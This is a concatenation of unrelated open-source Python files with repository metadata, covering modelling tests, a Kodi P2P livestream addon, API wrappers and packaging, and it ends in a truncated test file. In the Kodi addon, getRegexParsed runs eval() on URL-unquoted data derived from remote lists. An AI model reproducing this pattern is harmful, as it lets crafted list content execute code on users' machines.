avilla/core/resource/interface.py | RF-Tar-Railt/Avilla | 0 | 7852 | <filename>avilla/core/resource/interface.py
from __future__ import annotations
from dataclasses import dataclass
from avilla.core.platform import Base
from avilla.core.resource import Resource, ResourceProvider
@dataclass
class ResourceMatchPrefix:
resource_type: type[Resource]
keypath: str | None = None
platform: Base | None = None
class ResourceInterface:
providers: dict[ResourceMatchPrefix, ResourceProvider]
def __init__(self):
self.providers = {}
def register(
self,
resource_type: type[Resource],
provider: ResourceProvider,
*,
mainline_keypath: str | None = None,
platform: Base | None = None,
):
self.providers[ResourceMatchPrefix(resource_type, mainline_keypath, platform)] = provider
def get_provider(
self,
resource: Resource | type[Resource],
*,
mainline_keypath: str | None = None,
platform: Base | None = None,
) -> ResourceProvider | None:
resource_type = resource if isinstance(resource, type) else type(resource)
for prefix in self.providers:
if all((
prefix.resource_type is resource_type,
prefix.keypath == mainline_keypath if prefix.keypath is not None else True,
prefix.platform == platform if prefix.platform is not None else True
)):
return self.providers[prefix]
| 2.3125 | 2 |
viewer_examples/plugins/median_filter.py | atemysemicolon/scikit-image | 0 | 7853 | <filename>viewer_examples/plugins/median_filter.py
from skimage import data
from skimage.filter.rank import median
from skimage.morphology import disk
from skimage.viewer import ImageViewer
from skimage.viewer.widgets import Slider, OKCancelButtons, SaveButtons
from skimage.viewer.plugins.base import Plugin
def median_filter(image, radius):
return median(image, selem=disk(radius))
image = data.coins()
viewer = ImageViewer(image)
plugin = Plugin(image_filter=median_filter)
plugin += Slider('radius', 2, 10, value_type='int')
plugin += SaveButtons()
plugin += OKCancelButtons()
viewer += plugin
viewer.show()
| 2.3125 | 2 |
autotest/test_gwf_buy_lak01.py | scharlton2/modflow6 | 3 | 7854 | <gh_stars>1-10
# Test the buoyancy package and the variable density flows between the lake
# and the gwf model. This model has 4 layers and a lake incised within it.
# The model is transient and has heads in the aquifer higher than the initial
# stage in the lake. As the model runs, the lake and aquifer equalize and
# should end up at the same level. The test ensures that the initial and
# final water volumes in the entire system are the same. There are three
# different cases:
# 1. No buoyancy package
# 2. Buoyancy package with lake and aquifer density = 1000.
# 3. Buoyancy package with lake and aquifer density = 1024.5
import os
import pytest
import sys
import numpy as np
try:
import flopy
except:
msg = "Error. FloPy package is not available.\n"
msg += "Try installing using the following command:\n"
msg += " pip install flopy"
raise Exception(msg)
from framework import testing_framework
from simulation import Simulation
ex = ["buy_lak_01a"] # , 'buy_lak_01b', 'buy_lak_01c']
buy_on_list = [False] # , True, True]
concbuylist = [0.0] # , 0., 35.]
exdirs = []
for s in ex:
exdirs.append(os.path.join("temp", s))
def build_model(idx, dir):
lx = 7.0
lz = 4.0
nlay = 4
nrow = 1
ncol = 7
nper = 1
delc = 1.0
delr = lx / ncol
delz = lz / nlay
top = 4.0
botm = [3.0, 2.0, 1.0, 0.0]
perlen = [10.0]
nstp = [50]
tsmult = [1.0]
Kh = 1.0
Kv = 1.0
tdis_rc = []
for i in range(nper):
tdis_rc.append((perlen[i], nstp[i], tsmult[i]))
nouter, ninner = 700, 300
hclose, rclose, relax = 1e-8, 1e-6, 0.97
name = ex[idx]
# build MODFLOW 6 files
ws = dir
sim = flopy.mf6.MFSimulation(
sim_name=name, version="mf6", exe_name="mf6", sim_ws=ws
)
# create tdis package
tdis = flopy.mf6.ModflowTdis(
sim, time_units="DAYS", nper=nper, perioddata=tdis_rc
)
# create gwf model
gwfname = "gwf_" + name
gwf = flopy.mf6.ModflowGwf(sim, modelname=gwfname, newtonoptions="NEWTON")
imsgwf = flopy.mf6.ModflowIms(
sim,
print_option="ALL",
outer_dvclose=hclose,
outer_maximum=nouter,
under_relaxation="NONE",
inner_maximum=ninner,
inner_dvclose=hclose,
rcloserecord=rclose,
linear_acceleration="BICGSTAB",
scaling_method="NONE",
reordering_method="NONE",
relaxation_factor=relax,
filename="{}.ims".format(gwfname),
)
idomain = np.full((nlay, nrow, ncol), 1)
idomain[0, 0, 1:6] = 0
idomain[1, 0, 2:5] = 0
idomain[2, 0, 3:4] = 0
dis = flopy.mf6.ModflowGwfdis(
gwf,
nlay=nlay,
nrow=nrow,
ncol=ncol,
delr=delr,
delc=delc,
top=top,
botm=botm,
idomain=idomain,
)
# initial conditions
strt = np.zeros((nlay, nrow, ncol), dtype=float)
strt[0, 0, :] = 3.5
strt[1, 0, :] = 3.0
strt[1, 0, 1:6] = 2.5
strt[2, 0, :] = 2.0
strt[3, 0, :] = 1.0
ic = flopy.mf6.ModflowGwfic(gwf, strt=strt)
# node property flow
npf = flopy.mf6.ModflowGwfnpf(
gwf,
xt3doptions=False,
save_flows=True,
save_specific_discharge=True,
icelltype=1,
k=Kh,
k33=Kv,
)
sto = flopy.mf6.ModflowGwfsto(gwf, sy=0.3, ss=0.0, iconvert=1)
c = concbuylist[idx]
lake_dense = 1000.0 + 0.7 * c
buy_on = buy_on_list[idx]
if buy_on:
pd = [(0, 0.7, 0.0, "none", "none")]
buy = flopy.mf6.ModflowGwfbuy(
gwf, packagedata=pd, denseref=1000.0, concentration=c
)
nlakeconn = 11 # note: number of connections for this lake
# pak_data = [lakeno, strt, nlakeconn, dense, boundname]
pak_data = [(0, 2.25, nlakeconn, lake_dense)]
connlen = delr / 2.0
connwidth = delc
bedleak = "None"
con_data = [
# con_data=(lakeno,iconn,(cellid),claktype,bedleak,belev,telev,connlen,connwidth )
(0, 0, (0, 0, 0), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
(0, 1, (1, 0, 1), "VERTICAL", bedleak, 10, 10, connlen, connwidth),
(0, 2, (1, 0, 1), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
(0, 3, (2, 0, 2), "VERTICAL", bedleak, 10, 10, connlen, connwidth),
(0, 4, (2, 0, 2), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
(0, 5, (3, 0, 3), "VERTICAL", bedleak, 10, 10, connlen, connwidth),
(0, 6, (2, 0, 4), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
(0, 7, (2, 0, 4), "VERTICAL", bedleak, 10, 10, connlen, connwidth),
(0, 8, (1, 0, 5), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
(0, 9, (1, 0, 5), "VERTICAL", bedleak, 10, 10, connlen, connwidth),
(0, 10, (0, 0, 6), "HORIZONTAL", bedleak, 10, 10, connlen, connwidth),
]
# period data
p_data = [
(0, "STATUS", "ACTIVE"),
]
# note: for specifying lake number, use fortran indexing!
fname = "{}.lak.obs.csv".format(gwfname)
lak_obs = {
fname: [
("lakestage", "stage", 1),
("lakevolume", "volume", 1),
("lak1", "lak", 1, 1),
("lak2", "lak", 1, 2),
("lak3", "lak", 1, 3),
("lak4", "lak", 1, 4),
("lak5", "lak", 1, 5),
("lak6", "lak", 1, 6),
("lak7", "lak", 1, 7),
("lak8", "lak", 1, 8),
("lak9", "lak", 1, 9),
("lak10", "lak", 1, 10),
("lak11", "lak", 1, 11),
],
# "digits": 10,
}
lak = flopy.mf6.modflow.ModflowGwflak(
gwf,
save_flows=True,
print_input=True,
print_flows=True,
print_stage=True,
stage_filerecord="{}.lak.bin".format(gwfname),
budget_filerecord="{}.lak.bud".format(gwfname),
nlakes=len(pak_data),
ntables=0,
packagedata=pak_data,
pname="LAK-1",
connectiondata=con_data,
perioddata=p_data,
observations=lak_obs,
auxiliary=["DENSITY"],
)
# output control
oc = flopy.mf6.ModflowGwfoc(
gwf,
budget_filerecord="{}.cbc".format(gwfname),
head_filerecord="{}.hds".format(gwfname),
headprintrecord=[("COLUMNS", 10, "WIDTH", 15, "DIGITS", 6, "GENERAL")],
saverecord=[("HEAD", "ALL"), ("BUDGET", "ALL")],
printrecord=[("HEAD", "LAST"), ("BUDGET", "LAST")],
)
return sim, None
def eval_results(sim):
print("evaluating results...")
# calculate volume of water and make sure it is conserved
name = ex[sim.idxsim]
gwfname = "gwf_" + name
fname = gwfname + ".lak.bin"
fname = os.path.join(sim.simpath, fname)
assert os.path.isfile(fname)
bobj = flopy.utils.HeadFile(fname, text="STAGE")
stage = bobj.get_alldata().flatten()
# print(stage)
fname = gwfname + ".hds"
fname = os.path.join(sim.simpath, fname)
assert os.path.isfile(fname)
hobj = flopy.utils.HeadFile(fname)
head = hobj.get_data()
# print(head)
# calculate initial water volume
v0 = 3.5 * 2 # outermost columns
v0 += 2.5 * 2 # next innermost columns
v0 += 2.0 * 2 # next innermost columns
v0 += 1.0 * 1 # middle column
v0 = v0 * 0.3 # specific yield
v0 = v0 + (2.25 - 2.0) * 2 + (2.25 - 1.0)
print("initial volume of water in model = {}".format(v0))
# calculate ending water volume in model
h = head[0, 0, 0]
s = stage[-1]
v = h * 4 + 2.0 * 2 + 1.0 * 1
v = v * 0.3 # specific yield
v = v + (s - 2.0) * 2 + (s - 1.0)
print("final volume of water in model = {}".format(v))
# check to make sure starting water volume same as equalized final volume
errmsg = "initial and final water volume not equal: {} {}".format(v0, v)
assert np.allclose(v0, v)
# todo: add a better check of the lake concentrations
# assert False
# - No need to change any code below
@pytest.mark.parametrize(
"idx, dir",
list(enumerate(exdirs)),
)
def test_mf6model(idx, dir):
# initialize testing framework
test = testing_framework()
# build the model
test.build_mf6_models(build_model, idx, dir)
# run the test model
test.run_mf6(Simulation(dir, exfunc=eval_results, idxsim=idx))
def main():
# initialize testing framework
test = testing_framework()
# run the test model
for idx, dir in enumerate(exdirs):
test.build_mf6_models(build_model, idx, dir)
sim = Simulation(dir, exfunc=eval_results, idxsim=idx)
test.run_mf6(sim)
if __name__ == "__main__":
# print message
print("standalone run of {}".format(os.path.basename(__file__)))
# run main routine
main()
| 2.484375 | 2 |
lesson-08/roll_dice_v1.0.py | hemiaoio/pylearning | 1 | 7855 | """
功能:模拟掷骰子
版本:1.0
"""
import random
def roll_dice():
roll = random.randint(1, 6)
return roll
def main():
total_times = 100000
result_list = [0] * 6
for i in range(total_times):
roll = roll_dice()
result_list[roll-1] += 1
for i, x in enumerate(result_list):
print('点数{}的次数:{},频率:{}'.format(i+1, x, x/total_times))
print(result_list)
if __name__ == '__main__':
main()
| 3.703125 | 4 |
composer/dataflow-python3/main.py | gxercavins/gcp-snippets | 2 | 7856 | <filename>composer/dataflow-python3/main.py
import argparse
import logging
import apache_beam as beam
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.options.pipeline_options import SetupOptions
def run(argv=None, save_main_session=True):
"""Dummy pipeline to test Python3 operator."""
parser = argparse.ArgumentParser()
known_args, pipeline_args = parser.parse_known_args(argv)
pipeline_options = PipelineOptions(pipeline_args)
pipeline_options.view_as(SetupOptions).save_main_session = save_main_session
p = beam.Pipeline(options=pipeline_options)
# Just a simple test
p | 'Create Events' >> beam.Create([1, 2, 3])
result = p.run()
result.wait_until_finish()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
run()
| 2.09375 | 2 |
dingtalk/message/conversation.py | kangour/dingtalk-python | 88 | 7857 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/11/30 下午3:02
# @Author : Matrix
# @Github : https://github.com/blackmatrix7/
# @Blog : http://www.cnblogs.com/blackmatrix/
# @File : messages.py
# @Software: PyCharm
import json
from ..foundation import *
from json import JSONDecodeError
__author__ = 'blackmatrix'
__all__ = ['async_send_msg', 'get_msg_send_result', 'get_msg_send_progress']
@dingtalk_resp
def async_send_msg(access_token, msgtype, agent_id, msgcontent, userid_list=None, dept_id_list=None, to_all_user=False):
try:
msgcontent = json.dumps(msgcontent)
except JSONDecodeError:
# 如果传入的msgcontent不能转换为json格式,依旧传给钉钉,由钉钉处理
pass
if not isinstance(userid_list, str):
userid_list = ','.join(userid_list)
args = locals().copy()
payload = {}
# 请求参数整理
for k, v in args.items():
if k in ('msgtype', 'agent_id', 'msgcontent', 'userid_list', 'dept_id_list'):
if v is not None:
payload.update({k: v})
resp = call_dingtalk_webapi(access_token, 'dingtalk.corp.message.corpconversation.asyncsend', **payload)
return resp
@dingtalk_resp
def get_msg_send_result(access_token, agent_id, task_id):
url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendresult')
payload = {'task_id': task_id, 'agent_id': agent_id}
return requests.get(url, params=payload)
@dingtalk_resp
def get_msg_send_progress(access_token, agent_id, task_id):
url = get_request_url(access_token, 'dingtalk.corp.message.corpconversation.getsendprogress')
payload = {'task_id': task_id, 'agent_id': agent_id}
return requests.get(url, params=payload)
if __name__ == '__main__':
pass
| 1.84375 | 2 |
backend/garpix_page/setup.py | griviala/garpix_page | 0 | 7858 | <reponame>griviala/garpix_page<filename>backend/garpix_page/setup.py
from setuptools import setup, find_packages
from os import path
here = path.join(path.abspath(path.dirname(__file__)), 'garpix_page')
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='garpix_page',
version='2.23.0',
description='',
long_description=long_description,
url='https://github.com/garpixcms/garpix_page',
author='Garpix LTD',
author_email='<EMAIL>',
license='MIT',
packages=find_packages(exclude=['testproject', 'testproject.*']),
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Framework :: Django',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
],
include_package_data=True,
zip_safe=False,
install_requires=[
'Django >= 1.11',
'django-polymorphic-tree-for-garpix-page >= 2.1.1',
'django-modeltranslation >= 0.16.2',
'django-multiurl >= 1.4.0',
'djangorestframework >= 3.12.4',
'garpix_utils >= 1.4.0',
'django-tabbed-admin >= 1.0.4',
'model-bakery >= 1.4.0'
],
)
| 1.328125 | 1 |
.kodi/addons/plugin.video.p2p-streams/resources/core/livestreams.py | C6SUMMER/allinclusive-kodi-pi | 0 | 7859 | # -*- coding: utf-8 -*-
""" p2p-streams (c) 2014 enen92 fightnight
This file contains the livestream addon engine. It is mostly based on divingmule work on livestreams addon!
Functions:
xml_lists_menu() -> main menu for the xml list category
addlista() -> add a new list. It'll ask for local or remote and processes the given input
remove_list(name) -> Remove a list
get_groups(url) -> First regex function to parse a given list. Sopcast type list
get_channels(name,url) -> Second regex function to parse a given list. Used to general livestreams xml type lists
getData(url,fanart) -> Get the item data such as iconimage, fanart, etc
getChannelItems(name,url,fanart) -> Function to grab the channel items
getItems(items,fanart) -> Function to grab the items from the xml
removeNonAscii(s) -> Function to remove non-ascii characters from the list
getSoup(url) -> uses beautifulsoup to parse a remote xml
addon_log(string) -> Simple log/print function
getRegexParsed(regexs, url) -> parse the regex expression
list_type(url) -> Checks if the list is xml or m3u
parse_m3u(url) -> Parses a m3u type list
"""
import urllib,urllib2,re,xbmcplugin,xbmcgui,xbmc,xbmcaddon,HTMLParser,time,datetime,os,xbmcvfs,sys
from BeautifulSoup import BeautifulStoneSoup, BeautifulSoup, BeautifulSOAP
from peertopeerutils.pluginxbmc import *
from peertopeerutils.webutils import *
from peertopeerutils.directoryhandle import *
from peertopeerutils.iofile import *
"""
Main Menu
"""
def xml_lists_menu():
if settings.getSetting('sopcast-oficial') == "true":
addDir(translate(40116),"http://sopcast.org/chlist.xml",101,addonpath + art + 'xml_list_sopcast.png',2,True)
try:
if os.path.exists(os.path.join(pastaperfil,"Lists")):
dirs, files = xbmcvfs.listdir(os.path.join(pastaperfil,"Lists"))
for file in files:
f = open(os.path.join(pastaperfil,"Lists",file), "r")
string = f.read()
if xbmcvfs.exists(os.path.join(pastaperfil,"Lists-fanart",file.replace('.txt','.jpg'))):addDir("[B][COLOR orange]" + file.replace(".txt","") + "[/B][/COLOR]",string,101,addonpath + art + 'xml_lists.png',2,True,fan_art=os.path.join(pastaperfil,"Lists-fanart",file.replace('.txt','.jpg')))
else: addDir("[B][COLOR orange]" + file.replace(".txt","") + "[/B][/COLOR]",string,101,addonpath + art + 'xml_lists.png',2,True)
except: pass
addDir(translate(40121),MainURL,107,addonpath + art + 'plus-menu.png',2,False)
#xbmc.executebuiltin("Container.SetViewMode(51)")
"""
Add a new list function
"""
def addlista():
opcao= xbmcgui.Dialog().yesno(translate(40000), translate(40123),"","",translate(40124),translate(40125))
if opcao:
dialog = xbmcgui.Dialog()
lista_xml = dialog.browse(int(1), translate(40186), 'myprograms','.xml|.m3u')
keybdois = xbmc.Keyboard("", translate(40130))
keybdois.doModal()
if (keybdois.isConfirmed()):
searchname = keybdois.getText()
if searchname=='': sys.exit(0)
encode=urllib.quote(searchname)
if xbmcvfs.exists(os.path.join(pastaperfil,"Lists")): pass
else: xbmcvfs.mkdir(os.path.join(pastaperfil,"Lists"))
txt_name = searchname + ".txt"
save(os.path.join(pastaperfil,"Lists",txt_name),lista_xml)
mensagemok(translate(40000),translate(40129))
xbmc.executebuiltin("XBMC.Container.Refresh")
else:
keyb = xbmc.Keyboard("", translate(40127))
keyb.doModal()
if (keyb.isConfirmed()):
search = keyb.getText()
if search=='': sys.exit(0)
if "dropbox" in search and not "?dl=1" in search: search = search + '?dl=1'
if "xml" not in search.split(".")[-1] and "m3u" not in search.split(".")[-1]: mensagemok(translate(40000),translate(40128)); sys.exit(0)
else:
try:
code = get_page_source(search)
except:
mensagemok(translate(40000),translate(40128))
sys.exit(0)
keybdois = xbmc.Keyboard("", translate(40130))
keybdois.doModal()
if (keybdois.isConfirmed()):
searchname = keybdois.getText()
if searchname=='': sys.exit(0)
encode=urllib.quote(searchname)
if os.path.exists(os.path.join(pastaperfil,"Lists")): pass
else: xbmcvfs.mkdir(os.path.join(pastaperfil,"Lists"))
txt_name = searchname + ".txt"
save(os.path.join(pastaperfil,"Lists",txt_name),search)
mensagemok(translate(40000),translate(40129))
xbmc.executebuiltin("XBMC.Container.Refresh")
"""
Remove a List
"""
def remove_list(name):
xbmcvfs.delete(name)
xbmc.executebuiltin("Notification(%s,%s,%i,%s)" % (translate(40000), translate(40150), 1,addonpath+"/icon.png"))
xbmc.executebuiltin("Container.Refresh")
"""
Parsing functions
"""
def list_type(url):
ltype = url.split('.')[-1]
if 'xml' in ltype: get_groups(url)
elif 'm3u' in ltype: parse_m3u(url)
else: pass
def parse_m3u(url):
if "http" in url: content = get_page_source(url)
else: content = readfile(url)
match = re.compile('#EXTINF:.+?,(.*?)\n(.*?)(?:\r|\n)').findall(content)
for channel_name,stream_url in match:
if 'plugin://' in stream_url:
stream_url = 'XBMC.RunPlugin('+stream_url+')'
addDir(channel_name,stream_url,106,'',1,False)
elif 'sop://' in stream_url:
addDir(channel_name,stream_url,2,'',1,False)
elif ('acestream://' in stream_url) or ('.acelive' in stream_url) or ('.torrent' in stream_url):
addDir(channel_name,stream_url,1,'',1,False)
else: addLink(channel_name,stream_url,'')
def get_groups(url):
from xml.etree import ElementTree
try:
print("Sopcast xml-type list detected")
if "http" in url:
source = get_page_source(url)
save(os.path.join(pastaperfil,"working.xml"),source)
workingxml = os.path.join(pastaperfil,"working.xml")
else:
workingxml = url
groups = ElementTree.parse(workingxml).findall('.//group')
unname_group_index = 1
LANGUAGE = "en"
for group in groups:
if group.attrib[LANGUAGE] == "":
group.attrib[LANGUAGE] = str(unname_group_index)
unname_group_index = unname_group_index + 1
if re.sub('c','e',LANGUAGE) == LANGUAGE:
OTHER_LANG = re.sub('e','c',LANGUAGE)
else:
OTHER_LANG = re.sub('c','e',LANGUAGE)
if LANGUAGE == "cn":
try:
if len(group.attrib[OTHER_LANG]) > 0:
group.attrib[LANGUAGE] = group.attrib[OTHER_LANG]
unname_group_index = unname_group_index - 1
except:
pass
if (group.find('.//channel')==None): continue
group_name=group.attrib[LANGUAGE]
try:
addDir_livestreams_common(group_name,url,102,addonpath + art + 'xml_list_sopcast.png',True)
except: pass
#xbmc.executebuiltin("Container.SetViewMode(51)")
except:
print("Other type of xml list")
getData(url,"")
def get_channels(name,url):
from xml.etree import ElementTree
if url.startswith('http://'):
source = get_page_source(url)
else:
source = readfile(url)
save(os.path.join(pastaperfil,"working.xml"),source)
chlist_tree = ElementTree.parse(os.path.join(pastaperfil,"working.xml"))
LANGUAGE = "en"
groups = ElementTree.parse(os.path.join(pastaperfil,"working.xml")).findall('.//group')
for group in groups:
if group.attrib[LANGUAGE].encode('utf-8') == name:
channels = group.findall('.//channel')
for channel in channels:
try:
try:
title = channel.find('.//name').attrib['en'].encode('utf-8')
except: title = ''
if not title:
try: title = channel.find('.//name').attrib['cn'].encode('utf-8')
except: title = ''
if not title:
try: title = channel.find('.//name').text
except: title = ''
tipo = channel.find('.//stream_type').text
sop_address = channel.find('.//item').text
if not tipo: tipo = "N/A"
if not title: title = "N/A"
thumbnail = ""
try:
thumbnail = channel.find('.//thumbnail').text
except: pass
if sop_address:
if thumbnail == "": thumbnail = addonpath + art + 'sopcast_link.png'
try: addDir_livestreams_common('[B][COLOR orange]' + title + ' [/B][/COLOR](' + tipo +')',sop_address,2,thumbnail,False)
except:pass
else: pass
except: pass
else: pass
def getData(url,fanart):
soup = getSoup(url)
if len(soup('channels')) > 0:
channels = soup('channel')
for channel in channels:
name = channel('name')[0].string
thumbnail = channel('thumbnail')[0].string
if thumbnail == None:
thumbnail = ''
try:
if not channel('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = fanart
else:
fanArt = channel('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
try:
desc = channel('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = channel('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = channel('date')[0].string
if date == None:
raise
except:
date = ''
try:
credits = channel('credits')[0].string
if credits == None:
raise
except:
credits = ''
try:
addDir_livestreams(name.encode('utf-8', 'ignore'),url.encode('utf-8'),103,thumbnail,fanArt,desc,genre,date,credits,True)
except:
addon_log('There was a problem adding directory from getData(): '+name.encode('utf-8', 'ignore'))
else:
addon_log('No Channels: getItems')
getItems(soup('item'),fanart)
def getChannelItems(name,url,fanart):
soup = getSoup(url)
channel_list = soup.find('channel', attrs={'name' : name.decode('utf-8')})
items = channel_list('item')
try:
fanArt = channel_list('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
for channel in channel_list('subchannel'):
name = channel('name')[0].string
try:
thumbnail = channel('thumbnail')[0].string
if thumbnail == None:
raise
except:
thumbnail = ''
try:
if not channel('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = channel('fanart')[0].string
if fanArt == None:
raise
except:
pass
try:
desc = channel('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = channel('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = channel('date')[0].string
if date == None:
raise
except:
date = ''
try:
credits = channel('credits')[0].string
if credits == None:
raise
except:
credits = ''
try:
addDir_livestreams(name.encode('utf-8', 'ignore'),url.encode('utf-8'),3,thumbnail,fanArt,desc,genre,credits,date)
except:
addon_log('There was a problem adding directory - '+name.encode('utf-8', 'ignore'))
getItems(items,fanArt)
def getItems(items,fanart):
total = len(items)
addon_log('Total Items: %s' %total)
for item in items:
try:
name = item('title')[0].string
if name is None:
name = 'unknown?'
except:
addon_log('Name Error')
name = ''
try:
if item('epg'):
if item.epg_url:
addon_log('Get EPG Regex')
epg_url = item.epg_url.string
epg_regex = item.epg_regex.string
epg_name = get_epg(epg_url, epg_regex)
if epg_name:
name += ' - ' + epg_name
elif item('epg')[0].string > 1:
name += getepg(item('epg')[0].string)
else:
pass
except:
addon_log('EPG Error')
try:
url = []
for i in item('link'):
if not i.string == None:
url.append(i.string)
if len(url) < 1:
raise
except:
addon_log('Error <link> element, Passing:'+name.encode('utf-8', 'ignore'))
continue
try:
thumbnail = item('thumbnail')[0].string
if thumbnail == None:
raise
except:
thumbnail = ''
try:
if not item('fanart'):
if addon.getSetting('use_thumb') == "true":
fanArt = thumbnail
else:
fanArt = fanart
else:
fanArt = item('fanart')[0].string
if fanArt == None:
raise
except:
fanArt = fanart
try:
desc = item('info')[0].string
if desc == None:
raise
except:
desc = ''
try:
genre = item('genre')[0].string
if genre == None:
raise
except:
genre = ''
try:
date = item('date')[0].string
if date == None:
raise
except:
date = ''
regexs = None
if item('regex'):
try:
regexs = {}
for i in item('regex'):
regexs[i('name')[0].string] = {}
regexs[i('name')[0].string]['expre'] = i('expres')[0].string
regexs[i('name')[0].string]['page'] = i('page')[0].string
try:
regexs[i('name')[0].string]['refer'] = i('referer')[0].string
except:
addon_log("Regex: -- No Referer --")
try:
regexs[i('name')[0].string]['agent'] = i('agent')[0].string
except:
addon_log("Regex: -- No User Agent --")
regexs = urllib.quote(repr(regexs))
except:
regexs = None
addon_log('regex Error: '+name.encode('utf-8', 'ignore'))
try:
if "RunPlugin" in url[0]:
try:
addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],106,thumbnail,fanArt,desc,genre,"credits",date)
except:
match = re.compile("&name=(.+?)\)").findall(url[0].replace(";",""))
if match:
try:
addDir_livestreams(name.encode('utf-8', 'ignore'),removeNonAscii(url[0]),106,thumbnail,fanArt,desc,genre,credits,date)
except:
try:
addDir_livestreams(removeNonAscii(name.encode('utf-8', 'ignore')),removeNonAscii(url[0].replace(";","")),106,thumbnail,fanArt,desc,genre,credits,date)
except:
addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore'))
else:
addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore'))
else:
if ('acestream://' in url[0]) or ('.acelive' in url[0]) or ('.torrent' in url[0]):
if 'plugin://' not in url[0]:
addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],1,thumbnail,fanArt,desc,genre,"credits",date)
else:
addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
elif 'sop://' in url[0]:
if 'plugin://' not in url[0]:
addDir_livestreams(name.encode('utf-8', 'ignore'),url[0],2,thumbnail,fanArt,desc,genre,"credits",date)
else:
addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
else: addLink_livestreams(url[0].replace(';',''),name.encode('utf-8', 'ignore'),thumbnail,fanArt,desc,genre,date,True,None,regexs,total)
except:
addon_log('There was a problem adding item - '+name.encode('utf-8', 'ignore'))
def removeNonAscii(s): return "".join(filter(lambda x: ord(x)<128, s))
def getSoup(url):
if url.startswith('http://'):
data = makeRequest(url)
else:
if xbmcvfs.exists(url):
if url.startswith("smb://") or url.startswith("nfs://"):
copy = xbmcvfs.copy(url, os.path.join(profile, 'temp', 'sorce_temp.txt'))
if copy:
data = open(os.path.join(profile, 'temp', 'sorce_temp.txt'), "r").read()
xbmcvfs.delete(os.path.join(profile, 'temp', 'sorce_temp.txt'))
else:
addon_log("failed to copy from smb:")
else:
data = open(url, 'r').read()
else:
addon_log("Soup Data not found!")
return
return BeautifulSOAP(data, convertEntities=BeautifulStoneSoup.XML_ENTITIES)
def addon_log(string):
print(string)
def getRegexParsed(regexs, url):
regexs = eval(urllib.unquote(regexs))
cachedPages = {}
doRegexs = re.compile('\$doregex\[([^\]]*)\]').findall(url)
for k in doRegexs:
if k in regexs:
m = regexs[k]
if m['page'] in cachedPages:
link = cachedPages[m['page']]
else:
req = urllib2.Request(m['page'])
req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1')
if 'refer' in m:
req.add_header('Referer', m['refer'])
if 'agent' in m:
req.add_header('User-agent', m['agent'])
response = urllib2.urlopen(req)
link = response.read()
response.close()
cachedPages[m['page']] = link
reg = re.compile(m['expre']).search(link)
url = url.replace("$doregex[" + k + "]", reg.group(1).strip())
item = xbmcgui.ListItem(path=url)
xbmcplugin.setResolvedUrl(int(sys.argv[1]), True, item)
| 2.203125 | 2 |
RainIt/rain_it/ric/Procedure.py | luisgepeto/RainItPi | 0 | 7860 | <gh_stars>0
from ric.RainItComposite import RainItComposite
class Procedure(RainItComposite):
def __init__(self):
super().__init__()
def get_pickle_form(self):
return self
| 2.015625 | 2 |
1067.py | FahimFBA/URI-Problem-Solve | 3 | 7861 | <gh_stars>1-10
valor = int(input())
for i in range(valor+1):
if(i%2 != 0):
print(i) | 2.9375 | 3 |
api-reference-examples/python/te-tag-query/api-example-update.py | b-bold/ThreatExchange | 997 | 7862 | #!/usr/bin/env python
# ================================================================
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# ================================================================
import sys
import json
import TE
TE.Net.setAppTokenFromEnvName("TX_ACCESS_TOKEN")
postParams = {
"descriptor_id": "4036655176350945", # ID of the descriptor to be updated
"reactions": "INGESTED,IN_REVIEW",
}
showURLs = False
dryRun = False
validationErrorMessage, serverSideError, responseBody = TE.Net.updateThreatDescriptor(
postParams, showURLs, dryRun
)
if validationErrorMessage != None:
sys.stderr.write(validationErrorMessage + "\n")
sys.exit(1)
if serverSideError != None:
sys.stderr.write(str(serverSideError) + "\n")
sys.stderr.write(json.dumps(responseBody) + "\n")
sys.exit(1)
print(json.dumps(responseBody))
| 1.882813 | 2 |
loaner/web_app/backend/api/shelf_api_test.py | Bottom-Feeders/GrabNGO | 0 | 7863 | # Copyright 2018 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for backend.api.shelf_api."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import mock
from protorpc import message_types
from google.appengine.api import search
import endpoints
from loaner.web_app.backend.api import root_api # pylint: disable=unused-import
from loaner.web_app.backend.api import shelf_api
